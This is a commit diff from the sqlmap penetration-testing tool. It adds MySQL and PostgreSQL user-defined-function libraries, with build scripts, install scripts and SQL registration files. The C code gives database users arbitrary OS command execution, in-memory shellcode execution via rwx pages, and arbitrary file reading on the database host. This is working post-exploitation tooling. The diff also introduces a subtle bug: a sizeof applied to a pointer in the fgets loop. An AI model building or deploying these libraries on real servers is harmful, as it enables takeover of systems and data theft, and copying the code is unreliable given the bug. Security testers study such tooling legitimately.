mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-25 11:03:47 +03:00
Initial support for SQLite (90% approx).
Initial support for Firebird (30% approx). Initial support for Access (10% approx). Shared libraries code/installation scripts ported to 64bit, directory structure adapted. Minor code adjustments.
This commit is contained in:
parent
f1fde2e443
commit
0d559d14df
|
@ -435,10 +435,11 @@ char* sys_eval(
|
|||
, char *error
|
||||
){
|
||||
FILE *pipe;
|
||||
char line[1024];
|
||||
char *line;
|
||||
unsigned long outlen, linelen;
|
||||
|
||||
result = malloc(1);
|
||||
line = (char *)malloc(1024);
|
||||
result = (char *)malloc(1);
|
||||
outlen = 0;
|
||||
|
||||
pipe = popen(args->args[0], "r");
|
|
@ -46,6 +46,33 @@ DWORD WINAPI exec_payload(LPVOID lpParameter);
|
|||
PG_MODULE_MAGIC;
|
||||
#endif
|
||||
|
||||
char *text_ptr_to_char_ptr(text *arg)
|
||||
{
|
||||
char *retVal;
|
||||
int arg_size = VARSIZE(arg) - VARHDRSZ;
|
||||
retVal = (char *)malloc(arg_size + 1);
|
||||
|
||||
memcpy(retVal, VARDATA(arg), arg_size);
|
||||
retVal[arg_size] = '\0';
|
||||
|
||||
return retVal;
|
||||
}
|
||||
|
||||
text *chr_ptr_to_text_ptr(char *arg)
|
||||
{
|
||||
text *retVal;
|
||||
|
||||
retVal = (text *)malloc(VARHDRSZ + strlen(arg));
|
||||
#ifdef SET_VARSIZE
|
||||
SET_VARSIZE(retVal, VARHDRSZ + strlen(arg));
|
||||
#else
|
||||
VARATT_SIZEP(retVal) = strlen(arg) + VARHDRSZ;
|
||||
#endif
|
||||
memcpy(VARDATA(retVal), arg, strlen(arg));
|
||||
|
||||
return retVal;
|
||||
}
|
||||
|
||||
PG_FUNCTION_INFO_V1(sys_exec);
|
||||
#ifdef PGDLLIMPORT
|
||||
extern PGDLLIMPORT Datum sys_exec(PG_FUNCTION_ARGS) {
|
||||
|
@ -53,15 +80,10 @@ extern PGDLLIMPORT Datum sys_exec(PG_FUNCTION_ARGS) {
|
|||
extern DLLIMPORT Datum sys_exec(PG_FUNCTION_ARGS) {
|
||||
#endif
|
||||
text *argv0 = PG_GETARG_TEXT_P(0);
|
||||
int32 argv0_size;
|
||||
int32 result = 0;
|
||||
char *command;
|
||||
|
||||
argv0_size = VARSIZE(argv0) - VARHDRSZ;
|
||||
command = (char *)malloc(argv0_size + 1);
|
||||
|
||||
memcpy(command, VARDATA(argv0), argv0_size);
|
||||
command[argv0_size] = '\0';
|
||||
command = text_ptr_to_char_ptr(argv0);
|
||||
|
||||
/*
|
||||
Only if you want to log
|
||||
|
@ -83,24 +105,20 @@ extern DLLIMPORT Datum sys_eval(PG_FUNCTION_ARGS) {
|
|||
#endif
|
||||
text *argv0 = PG_GETARG_TEXT_P(0);
|
||||
text *result_text;
|
||||
int32 argv0_size;
|
||||
char *command;
|
||||
char *result;
|
||||
FILE *pipe;
|
||||
char line[1024];
|
||||
char *line;
|
||||
int32 outlen, linelen;
|
||||
|
||||
argv0_size = VARSIZE(argv0) - VARHDRSZ;
|
||||
command = (char *)malloc(argv0_size + 1);
|
||||
|
||||
memcpy(command, VARDATA(argv0), argv0_size);
|
||||
command[argv0_size] = '\0';
|
||||
command = text_ptr_to_char_ptr(argv0);
|
||||
|
||||
/*
|
||||
Only if you want to log
|
||||
elog(NOTICE, "Command evaluated: %s", command);
|
||||
*/
|
||||
|
||||
line = (char *)malloc(1024);
|
||||
result = (char *)malloc(1);
|
||||
outlen = 0;
|
||||
|
||||
|
@ -119,13 +137,7 @@ extern DLLIMPORT Datum sys_eval(PG_FUNCTION_ARGS) {
|
|||
result[outlen-1] = 0x00;
|
||||
}
|
||||
|
||||
result_text = (text *)malloc(VARHDRSZ + strlen(result));
|
||||
#ifdef SET_VARSIZE
|
||||
SET_VARSIZE(result_text, VARHDRSZ + strlen(result));
|
||||
#else
|
||||
VARATT_SIZEP(result_text) = strlen(result) + VARHDRSZ;
|
||||
#endif
|
||||
memcpy(VARDATA(result_text), result, strlen(result));
|
||||
result_text = chr_ptr_to_text_ptr(result);
|
||||
|
||||
PG_RETURN_POINTER(result_text);
|
||||
}
|
||||
|
@ -216,7 +228,6 @@ extern DLLIMPORT Datum sys_fileread(PG_FUNCTION_ARGS) {
|
|||
#endif
|
||||
text *argv0 = PG_GETARG_TEXT_P(0);
|
||||
text *result_text;
|
||||
int32 argv0_size;
|
||||
int32 len;
|
||||
int32 i, j;
|
||||
char *filename;
|
||||
|
@ -225,11 +236,7 @@ extern DLLIMPORT Datum sys_fileread(PG_FUNCTION_ARGS) {
|
|||
char table[] = "0123456789ABCDEF";
|
||||
FILE *file;
|
||||
|
||||
argv0_size = VARSIZE(argv0) - VARHDRSZ;
|
||||
filename = (char *)malloc(argv0_size + 1);
|
||||
|
||||
memcpy(filename, VARDATA(argv0), argv0_size);
|
||||
filename[argv0_size] = '\0';
|
||||
filename = text_ptr_to_char_ptr(argv0);
|
||||
|
||||
file = fopen(filename, "rb");
|
||||
if (!file)
|
||||
|
@ -258,13 +265,7 @@ extern DLLIMPORT Datum sys_fileread(PG_FUNCTION_ARGS) {
|
|||
}
|
||||
result[j] = '\0';
|
||||
|
||||
result_text = (text *)malloc(VARHDRSZ + strlen(result));
|
||||
#ifdef SET_VARSIZE
|
||||
SET_VARSIZE(result_text, VARHDRSZ + strlen(result));
|
||||
#else
|
||||
VARATT_SIZEP(result_text) = strlen(result) + VARHDRSZ;
|
||||
#endif
|
||||
memcpy(VARDATA(result_text), result, strlen(result));
|
||||
result_text = chr_ptr_to_text_ptr(result);
|
||||
|
||||
free(result);
|
||||
free(buffer);
|
9
extra/udfhack/linux/64/lib_mysqludf_sys/Makefile
Normal file
9
extra/udfhack/linux/64/lib_mysqludf_sys/Makefile
Normal file
|
@ -0,0 +1,9 @@
|
|||
# For MySQL < 5.1
|
||||
LIBDIR=/usr/lib
|
||||
# For MySQL >= 5.1
|
||||
#LIBDIR=/usr/lib/mysql/plugin
|
||||
|
||||
install:
|
||||
gcc-4.2 -Wall -I/usr/include/mysql -Os -shared lib_mysqludf_sys.c -fPIC -o lib_mysqludf_sys.so
|
||||
strip -sx lib_mysqludf_sys.so
|
||||
cp -f lib_mysqludf_sys.so $(LIBDIR)/lib_mysqludf_sys.so
|
47
extra/udfhack/linux/64/lib_mysqludf_sys/install.sh
Executable file
47
extra/udfhack/linux/64/lib_mysqludf_sys/install.sh
Executable file
|
@ -0,0 +1,47 @@
|
|||
#!/bin/bash
|
||||
# lib_mysqludf_sys - a library with miscellaneous (operating) system level functions
|
||||
# Copyright (C) 2007 Roland Bouman
|
||||
# Copyright (C) 2008-2010 Roland Bouman and Bernardo Damele A. G.
|
||||
# web: http://www.mysqludf.org/
|
||||
# email: mysqludfs@gmail.com, bernardo.damele@gmail.com
|
||||
#
|
||||
# This library is free software; you can redistribute it and/or
|
||||
# modify it under the terms of the GNU Lesser General Public
|
||||
# License as published by the Free Software Foundation; either
|
||||
# version 2.1 of the License, or (at your option) any later version.
|
||||
#
|
||||
# This library is distributed in the hope that it will be useful,
|
||||
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||
# Lesser General Public License for more details.
|
||||
#
|
||||
# You should have received a copy of the GNU Lesser General Public
|
||||
# License along with this library; if not, write to the Free Software
|
||||
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
|
||||
|
||||
# Adapt the following settings to your environment
|
||||
USER="root"
|
||||
PORT="3306"
|
||||
|
||||
echo "Compiling the MySQL UDF"
|
||||
make
|
||||
|
||||
if test $? -ne 0; then
|
||||
echo "ERROR: You need libmysqlclient development software installed"
|
||||
echo "to be able to compile this UDF, on Debian/Ubuntu just run:"
|
||||
echo "apt-get install libmysqlclient-dev"
|
||||
exit 1
|
||||
else
|
||||
echo "MySQL UDF compiled successfully"
|
||||
fi
|
||||
|
||||
echo -e "\nPlease provide your MySQL root password"
|
||||
|
||||
mysql -u ${USER} -P ${PORT} -p mysql < lib_mysqludf_sys.sql
|
||||
|
||||
if test $? -ne 0; then
|
||||
echo "ERROR: unable to install the UDF"
|
||||
exit 1
|
||||
else
|
||||
echo "MySQL UDF installed successfully"
|
||||
fi
|
|
@ -435,10 +435,11 @@ char* sys_eval(
|
|||
, char *error
|
||||
){
|
||||
FILE *pipe;
|
||||
char line[1024];
|
||||
char *line;
|
||||
unsigned long outlen, linelen;
|
||||
|
||||
result = malloc(1);
|
||||
line = (char *)malloc(1024);
|
||||
result = (char *)malloc(1);
|
||||
outlen = 0;
|
||||
|
||||
pipe = popen(args->args[0], "r");
|
35
extra/udfhack/linux/64/lib_mysqludf_sys/lib_mysqludf_sys.sql
Normal file
35
extra/udfhack/linux/64/lib_mysqludf_sys/lib_mysqludf_sys.sql
Normal file
|
@ -0,0 +1,35 @@
|
|||
/*
|
||||
lib_mysqludf_sys - a library with miscellaneous (operating) system level functions
|
||||
Copyright (C) 2007 Roland Bouman
|
||||
Copyright (C) 2008-2010 Roland Bouman and Bernardo Damele A. G.
|
||||
web: http://www.mysqludf.org/
|
||||
email: roland.bouman@gmail.com, bernardo.damele@gmail.com
|
||||
|
||||
This library is free software; you can redistribute it and/or
|
||||
modify it under the terms of the GNU Lesser General Public
|
||||
License as published by the Free Software Foundation; either
|
||||
version 2.1 of the License, or (at your option) any later version.
|
||||
|
||||
This library is distributed in the hope that it will be useful,
|
||||
but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||
Lesser General Public License for more details.
|
||||
|
||||
You should have received a copy of the GNU Lesser General Public
|
||||
License along with this library; if not, write to the Free Software
|
||||
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
|
||||
*/
|
||||
|
||||
DROP FUNCTION IF EXISTS lib_mysqludf_sys_info;
|
||||
DROP FUNCTION IF EXISTS sys_get;
|
||||
DROP FUNCTION IF EXISTS sys_set;
|
||||
DROP FUNCTION IF EXISTS sys_exec;
|
||||
DROP FUNCTION IF EXISTS sys_eval;
|
||||
DROP FUNCTION IF EXISTS sys_bineval;
|
||||
|
||||
CREATE FUNCTION lib_mysqludf_sys_info RETURNS string SONAME 'lib_mysqludf_sys.so';
|
||||
CREATE FUNCTION sys_get RETURNS string SONAME 'lib_mysqludf_sys.so';
|
||||
CREATE FUNCTION sys_set RETURNS int SONAME 'lib_mysqludf_sys.so';
|
||||
CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys.so';
|
||||
CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.so';
|
||||
CREATE FUNCTION sys_bineval RETURNS int SONAME 'lib_mysqludf_sys.so';
|
16
extra/udfhack/linux/64/lib_postgresqludf_sys/Makefile
Normal file
16
extra/udfhack/linux/64/lib_postgresqludf_sys/Makefile
Normal file
|
@ -0,0 +1,16 @@
|
|||
LIBDIR=/tmp
|
||||
|
||||
8.4:
|
||||
gcc-4.2 -Wall -I/usr/include/postgresql/8.4/server -Os -shared lib_postgresqludf_sys.c -fPIC -o lib_postgresqludf_sys.so
|
||||
strip -sx lib_postgresqludf_sys.so
|
||||
cp -f lib_postgresqludf_sys.so $(LIBDIR)/lib_postgresqludf_sys.so
|
||||
|
||||
8.3:
|
||||
gcc-4.2 -Wall -I/usr/include/postgresql/8.3/server -Os -shared lib_postgresqludf_sys.c -fPIC -o lib_postgresqludf_sys.so
|
||||
strip -sx lib_postgresqludf_sys.so
|
||||
cp -f lib_postgresqludf_sys.so $(LIBDIR)/lib_postgresqludf_sys.so
|
||||
|
||||
8.2:
|
||||
gcc-4.2 -Wall -I/usr/include/postgresql/8.2/server -Os -shared lib_postgresqludf_sys.c -fPIC -o lib_postgresqludf_sys.so
|
||||
strip -sx lib_postgresqludf_sys.so
|
||||
cp -f lib_postgresqludf_sys.so $(LIBDIR)/lib_postgresqludf_sys.so
|
59
extra/udfhack/linux/64/lib_postgresqludf_sys/install.sh
Executable file
59
extra/udfhack/linux/64/lib_postgresqludf_sys/install.sh
Executable file
|
@ -0,0 +1,59 @@
|
|||
#!/bin/bash
|
||||
# lib_postgresqludf_sys - a library with miscellaneous (operating) system level functions
|
||||
# Copyright (C) 2009-2010 Bernardo Damele A. G.
|
||||
# web: http://bernardodamele.blogspot.com/
|
||||
# email: bernardo.damele@gmail.com
|
||||
#
|
||||
# This library is free software; you can redistribute it and/or
|
||||
# modify it under the terms of the GNU Lesser General Public
|
||||
# License as published by the Free Software Foundation; either
|
||||
# version 2.1 of the License, or (at your option) any later version.
|
||||
#
|
||||
# This library is distributed in the hope that it will be useful,
|
||||
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||
# Lesser General Public License for more details.
|
||||
#
|
||||
# You should have received a copy of the GNU Lesser General Public
|
||||
# License along with this library; if not, write to the Free Software
|
||||
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
|
||||
|
||||
# Adapt the following settings to your environment
|
||||
USER="postgres"
|
||||
PORT="5434"
|
||||
VERSION="8.4"
|
||||
#PORT="5433"
|
||||
#VERSION="8.3"
|
||||
#PORT="5432"
|
||||
#VERSION="8.2"
|
||||
|
||||
echo "Compiling the PostgreSQL UDF"
|
||||
make ${VERSION}
|
||||
|
||||
if test $? -ne 0; then
|
||||
echo "ERROR: You need postgresql-server development software installed"
|
||||
echo "to be able to compile this UDF, on Debian/Ubuntu just run:"
|
||||
|
||||
if test "${VERSION}" == "8.2"; then
|
||||
echo "apt-get install postgresql-server-dev-8.2"
|
||||
elif test "${VERSION}" == "8.3"; then
|
||||
echo "apt-get install postgresql-server-dev-8.3"
|
||||
elif test "${VERSION}" == "8.4"; then
|
||||
echo "apt-get install postgresql-server-dev-8.4"
|
||||
fi
|
||||
|
||||
exit 1
|
||||
else
|
||||
echo "PostgreSQL UDF compiled successfully"
|
||||
fi
|
||||
|
||||
echo -e "\nPlease provide your PostgreSQL 'postgres' user's password"
|
||||
|
||||
psql -h 127.0.0.1 -p ${PORT} -U ${USER} -q template1 < lib_postgresqludf_sys.sql
|
||||
|
||||
if test $? -ne 0; then
|
||||
echo "ERROR: unable to install the UDF"
|
||||
exit 1
|
||||
else
|
||||
echo "PostgreSQL UDF installed successfully"
|
||||
fi
|
|
@ -0,0 +1,275 @@
|
|||
/*
|
||||
lib_postgresqludf_sys - a library with miscellaneous (operating) system level functions
|
||||
Copyright (C) 2009-2010 Bernardo Damele A. G.
|
||||
web: http://bernardodamele.blogspot.com/
|
||||
email: bernardo.damele@gmail.com
|
||||
|
||||
This library is free software; you can redistribute it and/or
|
||||
modify it under the terms of the GNU Lesser General Public
|
||||
License as published by the Free Software Foundation; either
|
||||
version 2.1 of the License, or (at your option) any later version.
|
||||
|
||||
This library is distributed in the hope that it will be useful,
|
||||
but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||
Lesser General Public License for more details.
|
||||
|
||||
You should have received a copy of the GNU Lesser General Public
|
||||
License along with this library; if not, write to the Free Software
|
||||
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
|
||||
*/
|
||||
|
||||
#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
|
||||
#define _USE_32BIT_TIME_T
|
||||
#define DLLEXP __declspec(dllexport)
|
||||
#define BUILDING_DLL 1
|
||||
#else
|
||||
#define DLLEXP
|
||||
#include <sys/mman.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/wait.h>
|
||||
#include <unistd.h>
|
||||
#endif
|
||||
|
||||
#include <postgres.h>
|
||||
#include <fmgr.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
|
||||
#include <ctype.h>
|
||||
|
||||
#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
|
||||
DWORD WINAPI exec_payload(LPVOID lpParameter);
|
||||
#endif
|
||||
|
||||
#ifdef PG_MODULE_MAGIC
|
||||
PG_MODULE_MAGIC;
|
||||
#endif
|
||||
|
||||
char *text_ptr_to_char_ptr(text *arg)
|
||||
{
|
||||
char *retVal;
|
||||
int arg_size = VARSIZE(arg) - VARHDRSZ;
|
||||
retVal = (char *)malloc(arg_size + 1);
|
||||
|
||||
memcpy(retVal, VARDATA(arg), arg_size);
|
||||
retVal[arg_size] = '\0';
|
||||
|
||||
return retVal;
|
||||
}
|
||||
|
||||
text *chr_ptr_to_text_ptr(char *arg)
|
||||
{
|
||||
text *retVal;
|
||||
|
||||
retVal = (text *)malloc(VARHDRSZ + strlen(arg));
|
||||
#ifdef SET_VARSIZE
|
||||
SET_VARSIZE(retVal, VARHDRSZ + strlen(arg));
|
||||
#else
|
||||
VARATT_SIZEP(retVal) = strlen(arg) + VARHDRSZ;
|
||||
#endif
|
||||
memcpy(VARDATA(retVal), arg, strlen(arg));
|
||||
|
||||
return retVal;
|
||||
}
|
||||
|
||||
PG_FUNCTION_INFO_V1(sys_exec);
|
||||
#ifdef PGDLLIMPORT
|
||||
extern PGDLLIMPORT Datum sys_exec(PG_FUNCTION_ARGS) {
|
||||
#else
|
||||
extern DLLIMPORT Datum sys_exec(PG_FUNCTION_ARGS) {
|
||||
#endif
|
||||
text *argv0 = PG_GETARG_TEXT_P(0);
|
||||
int32 result = 0;
|
||||
char *command;
|
||||
|
||||
command = text_ptr_to_char_ptr(argv0);
|
||||
|
||||
/*
|
||||
Only if you want to log
|
||||
elog(NOTICE, "Command execution: %s", command);
|
||||
*/
|
||||
|
||||
result = system(command);
|
||||
free(command);
|
||||
|
||||
PG_FREE_IF_COPY(argv0, 0);
|
||||
PG_RETURN_INT32(result);
|
||||
}
|
||||
|
||||
PG_FUNCTION_INFO_V1(sys_eval);
|
||||
#ifdef PGDLLIMPORT
|
||||
extern PGDLLIMPORT Datum sys_eval(PG_FUNCTION_ARGS) {
|
||||
#else
|
||||
extern DLLIMPORT Datum sys_eval(PG_FUNCTION_ARGS) {
|
||||
#endif
|
||||
text *argv0 = PG_GETARG_TEXT_P(0);
|
||||
text *result_text;
|
||||
char *command;
|
||||
char *result;
|
||||
FILE *pipe;
|
||||
char *line;
|
||||
int32 outlen, linelen;
|
||||
|
||||
command = text_ptr_to_char_ptr(argv0);
|
||||
|
||||
/*
|
||||
Only if you want to log
|
||||
elog(NOTICE, "Command evaluated: %s", command);
|
||||
*/
|
||||
|
||||
line = (char *)malloc(1024);
|
||||
result = (char *)malloc(1);
|
||||
outlen = 0;
|
||||
|
||||
pipe = popen(command, "r");
|
||||
|
||||
while (fgets(line, sizeof(line), pipe) != NULL) {
|
||||
linelen = strlen(line);
|
||||
result = (char *)realloc(result, outlen + linelen);
|
||||
strncpy(result + outlen, line, linelen);
|
||||
outlen = outlen + linelen;
|
||||
}
|
||||
|
||||
pclose(pipe);
|
||||
|
||||
if (*result) {
|
||||
result[outlen-1] = 0x00;
|
||||
}
|
||||
|
||||
result_text = chr_ptr_to_text_ptr(result);
|
||||
|
||||
PG_RETURN_POINTER(result_text);
|
||||
}
|
||||
|
||||
PG_FUNCTION_INFO_V1(sys_bineval);
|
||||
#ifdef PGDLLIMPORT
|
||||
extern PGDLLIMPORT Datum sys_bineval(PG_FUNCTION_ARGS) {
|
||||
#else
|
||||
extern DLLIMPORT Datum sys_bineval(PG_FUNCTION_ARGS) {
|
||||
#endif
|
||||
text *argv0 = PG_GETARG_TEXT_P(0);
|
||||
int32 argv0_size;
|
||||
size_t len;
|
||||
|
||||
#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
|
||||
int pID;
|
||||
char *code;
|
||||
#else
|
||||
int *addr;
|
||||
size_t page_size;
|
||||
pid_t pID;
|
||||
#endif
|
||||
|
||||
argv0_size = VARSIZE(argv0) - VARHDRSZ;
|
||||
len = (size_t)argv0_size;
|
||||
|
||||
#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
|
||||
// allocate a +rwx memory page
|
||||
code = (char *) VirtualAlloc(NULL, len+1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
strncpy(code, VARDATA(argv0), len);
|
||||
|
||||
WaitForSingleObject(CreateThread(NULL, 0, exec_payload, code, 0, &pID), INFINITE);
|
||||
#else
|
||||
pID = fork();
|
||||
if(pID<0)
|
||||
PG_RETURN_INT32(1);
|
||||
|
||||
if(pID==0)
|
||||
{
|
||||
page_size = (size_t)sysconf(_SC_PAGESIZE)-1; // get page size
|
||||
page_size = (len+page_size) & ~(page_size); // align to page boundary
|
||||
|
||||
// mmap an rwx memory page
|
||||
addr = mmap(0, page_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANONYMOUS, 0, 0);
|
||||
|
||||
if (addr == MAP_FAILED)
|
||||
PG_RETURN_INT32(1);
|
||||
|
||||
strncpy((char *)addr, VARDATA(argv0), len);
|
||||
|
||||
((void (*)(void))addr)();
|
||||
}
|
||||
|
||||
if(pID>0)
|
||||
waitpid(pID, 0, WNOHANG);
|
||||
#endif
|
||||
|
||||
PG_RETURN_INT32(0);
|
||||
}
|
||||
|
||||
#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
|
||||
DWORD WINAPI exec_payload(LPVOID lpParameter)
|
||||
{
|
||||
__try
|
||||
{
|
||||
__asm
|
||||
{
|
||||
mov eax, [lpParameter]
|
||||
call eax
|
||||
}
|
||||
}
|
||||
__except(EXCEPTION_EXECUTE_HANDLER)
|
||||
{
|
||||
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
#endif
|
||||
|
||||
#undef fopen
|
||||
|
||||
PG_FUNCTION_INFO_V1(sys_fileread);
|
||||
#ifdef PGDLLIMPORT
|
||||
extern PGDLLIMPORT Datum sys_fileread(PG_FUNCTION_ARGS) {
|
||||
#else
|
||||
extern DLLIMPORT Datum sys_fileread(PG_FUNCTION_ARGS) {
|
||||
#endif
|
||||
text *argv0 = PG_GETARG_TEXT_P(0);
|
||||
text *result_text;
|
||||
int32 len;
|
||||
int32 i, j;
|
||||
char *filename;
|
||||
char *result;
|
||||
char *buffer;
|
||||
char table[] = "0123456789ABCDEF";
|
||||
FILE *file;
|
||||
|
||||
filename = text_ptr_to_char_ptr(argv0);
|
||||
|
||||
file = fopen(filename, "rb");
|
||||
if (!file)
|
||||
{
|
||||
PG_RETURN_NULL();
|
||||
}
|
||||
fseek(file, 0, SEEK_END);
|
||||
len = ftell(file);
|
||||
fseek(file, 0, SEEK_SET);
|
||||
|
||||
buffer=(char *)malloc(len + 1);
|
||||
if (!buffer)
|
||||
{
|
||||
fclose(file);
|
||||
PG_RETURN_NULL();
|
||||
}
|
||||
|
||||
fread(buffer, len, 1, file);
|
||||
fclose(file);
|
||||
|
||||
result = (char *)malloc(2*len + 1);
|
||||
for (i=0, j=0; i<len; i++)
|
||||
{
|
||||
result[j++] = table[(buffer[i] >> 4) & 0x0f];
|
||||
result[j++] = table[ buffer[i] & 0x0f];
|
||||
}
|
||||
result[j] = '\0';
|
||||
|
||||
result_text = chr_ptr_to_text_ptr(result);
|
||||
|
||||
free(result);
|
||||
free(buffer);
|
||||
free(filename);
|
||||
|
||||
PG_RETURN_POINTER(result_text);
|
||||
}
|
|
@ -0,0 +1,25 @@
|
|||
/*
|
||||
lib_postgresqludf_sys - a library with miscellaneous (operating) system level functions
|
||||
Copyright (C) 2009-2010 Bernardo Damele A. G.
|
||||
web: http://bernardodamele.blogspot.com/
|
||||
email: bernardo.damele@gmail.com
|
||||
|
||||
This library is free software; you can redistribute it and/or
|
||||
modify it under the terms of the GNU Lesser General Public
|
||||
License as published by the Free Software Foundation; either
|
||||
version 2.1 of the License, or (at your option) any later version.
|
||||
|
||||
This library is distributed in the hope that it will be useful,
|
||||
but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||
Lesser General Public License for more details.
|
||||
|
||||
You should have received a copy of the GNU Lesser General Public
|
||||
License along with this library; if not, write to the Free Software
|
||||
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
|
||||
*/
|
||||
|
||||
CREATE OR REPLACE FUNCTION sys_exec(text) RETURNS int4 AS '/tmp/lib_postgresqludf_sys.so', 'sys_exec' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
|
||||
CREATE OR REPLACE FUNCTION sys_eval(text) RETURNS text AS '/tmp/lib_postgresqludf_sys.so', 'sys_eval' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
|
||||
CREATE OR REPLACE FUNCTION sys_bineval(text) RETURNS int4 AS '/tmp/lib_postgresqludf_sys.so', 'sys_bineval' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
|
||||
CREATE OR REPLACE FUNCTION sys_fileread(text) RETURNS text AS '/tmp/lib_postgresqludf_sys.so', 'sys_fileread' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
|
BIN
extra/udfhack/windows/32/lib_mysqludf_sys/lib_mysqludf_sys.sln
Normal file
BIN
extra/udfhack/windows/32/lib_mysqludf_sys/lib_mysqludf_sys.sln
Normal file
Binary file not shown.
|
@ -0,0 +1,564 @@
|
|||
/*
|
||||
lib_mysqludf_sys - a library with miscellaneous (operating) system level functions
|
||||
Copyright (C) 2007 Roland Bouman
|
||||
Copyright (C) 2008-2010 Roland Bouman and Bernardo Damele A. G.
|
||||
web: http://www.mysqludf.org/
|
||||
email: mysqludfs@gmail.com, bernardo.damele@gmail.com
|
||||
|
||||
This library is free software; you can redistribute it and/or
|
||||
modify it under the terms of the GNU Lesser General Public
|
||||
License as published by the Free Software Foundation; either
|
||||
version 2.1 of the License, or (at your option) any later version.
|
||||
|
||||
This library is distributed in the hope that it will be useful,
|
||||
but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||
Lesser General Public License for more details.
|
||||
|
||||
You should have received a copy of the GNU Lesser General Public
|
||||
License along with this library; if not, write to the Free Software
|
||||
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
|
||||
*/
|
||||
|
||||
#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
|
||||
#define DLLEXP __declspec(dllexport)
|
||||
#else
|
||||
#define DLLEXP
|
||||
#include <sys/types.h>
|
||||
#include <sys/wait.h>
|
||||
#include <unistd.h>
|
||||
#endif
|
||||
|
||||
#ifdef STANDARD
|
||||
#include <string.h>
|
||||
#include <stdlib.h>
|
||||
#include <time.h>
|
||||
#ifdef __WIN__
|
||||
typedef unsigned __int64 ulonglong;
|
||||
typedef __int64 longlong;
|
||||
#else
|
||||
typedef unsigned long long ulonglong;
|
||||
typedef long long longlong;
|
||||
#endif /*__WIN__*/
|
||||
#else
|
||||
#include <my_global.h>
|
||||
#include <my_sys.h>
|
||||
#endif
|
||||
#include <mysql.h>
|
||||
#include <m_ctype.h>
|
||||
#include <m_string.h>
|
||||
#include <stdlib.h>
|
||||
|
||||
#include <ctype.h>
|
||||
|
||||
#ifdef HAVE_DLOPEN
|
||||
#ifdef __cplusplus
|
||||
extern "C" {
|
||||
#endif
|
||||
|
||||
#define LIBVERSION "lib_mysqludf_sys version 0.0.3"
|
||||
|
||||
#ifdef __WIN__
|
||||
#define SETENV(name,value) SetEnvironmentVariable(name,value);
|
||||
#else
|
||||
#define SETENV(name,value) setenv(name,value,1);
|
||||
#endif
|
||||
|
||||
DLLEXP
|
||||
my_bool lib_mysqludf_sys_info_init(
|
||||
UDF_INIT *initid
|
||||
, UDF_ARGS *args
|
||||
, char *message
|
||||
);
|
||||
|
||||
DLLEXP
|
||||
void lib_mysqludf_sys_info_deinit(
|
||||
UDF_INIT *initid
|
||||
);
|
||||
|
||||
DLLEXP
|
||||
char* lib_mysqludf_sys_info(
|
||||
UDF_INIT *initid
|
||||
, UDF_ARGS *args
|
||||
, char* result
|
||||
, unsigned long* length
|
||||
, char *is_null
|
||||
, char *error
|
||||
);
|
||||
|
||||
/**
|
||||
* sys_get
|
||||
*
|
||||
* Gets the value of the specified environment variable.
|
||||
*/
|
||||
DLLEXP
|
||||
my_bool sys_get_init(
|
||||
UDF_INIT *initid
|
||||
, UDF_ARGS *args
|
||||
, char *message
|
||||
);
|
||||
|
||||
DLLEXP
|
||||
void sys_get_deinit(
|
||||
UDF_INIT *initid
|
||||
);
|
||||
|
||||
DLLEXP
|
||||
char* sys_get(
|
||||
UDF_INIT *initid
|
||||
, UDF_ARGS *args
|
||||
, char* result
|
||||
, unsigned long* length
|
||||
, char *is_null
|
||||
, char *error
|
||||
);
|
||||
|
||||
/**
|
||||
* sys_set
|
||||
*
|
||||
* Sets the value of the environment variables.
|
||||
* This function accepts a set of name/value pairs
|
||||
* which are then set as environment variables.
|
||||
* Use sys_get to retrieve the value of such a variable
|
||||
*/
|
||||
DLLEXP
|
||||
my_bool sys_set_init(
|
||||
UDF_INIT *initid
|
||||
, UDF_ARGS *args
|
||||
, char *message
|
||||
);
|
||||
|
||||
DLLEXP
|
||||
void sys_set_deinit(
|
||||
UDF_INIT *initid
|
||||
);
|
||||
|
||||
DLLEXP
|
||||
long long sys_set(
|
||||
UDF_INIT *initid
|
||||
, UDF_ARGS *args
|
||||
, char *is_null
|
||||
, char *error
|
||||
);
|
||||
|
||||
